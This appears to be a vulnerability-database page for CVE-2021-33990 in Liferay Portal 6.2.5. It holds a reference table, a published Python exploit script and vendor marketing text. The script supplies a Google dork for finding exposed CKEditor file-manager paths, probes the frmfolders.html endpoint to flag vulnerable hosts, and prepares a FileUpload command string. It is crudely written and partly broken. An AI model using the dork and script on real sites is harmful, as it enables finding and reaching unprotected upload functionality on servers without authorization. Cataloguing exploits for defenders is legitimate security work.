| Reporter | Title | Published | Views | Family All 14 |
|---|---|---|---|---|
| Liferay Portal 6.2.5 - Insecure Permissions Exploit | 5 Apr 202300:00 | – | zdt | |
| CVE-2021-33990 | 16 Apr 202307:27 | – | circl | |
| Liferay Portal 安全漏洞 | 5 Apr 202300:00 | – | cnnvd | |
| CVE-2021-33990 | 16 Apr 202300:00 | – | cve | |
| CVE-2021-33990 | 16 Apr 202300:00 | – | cvelist | |
| CVE-2021-33990 | 16 Apr 202304:15 | – | nvd | |
| Liferay Portal 6.2.5 Insecure Permissions | 5 Apr 202300:00 | – | packetstorm | |
| Design/Logic Flaw | 16 Apr 202304:15 | – | prion | |
| PT-2023-12239 · Liferay · Liferay Portal | 16 Apr 202300:00 | – | ptsecurity | |
| CVE-2021-33990 | 9 Jan 202611:28 | – | redhatcve |
# Exploit Title: Liferay Portal 6.2.5 - Insecure Permissions
# Google Dork: -inurl:/html/js/editor/ckeditor/editor/filemanager/browser/
# Date: 2021/05
# Exploit Author: fu2x2000
# Version: Liferay Portal 6.2.5 or later
# CVE : CVE-2021-33990
import requests
import json
print (" Search this on Google #Dork for liferay
-inurl:/html/js/editor/ckeditor/editor/filemanager/browser/")
url ="URL Goes Here
/html/js/editor/ckeditor/editor/filemanager/browser/liferay/frmfolders.html"
req = requests.get(url)
print req
sta = req.status_code
if sta == 200:
print ('Life Vulnerability exists')
cook = url
print cook
inject = "Command=FileUpload&Type=File&CurrentFolder=/"
#cook_inject = cook+inject
#print cook_inject
else:
print ('not found try a another method')
print ("solution restrict access and user groups")Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation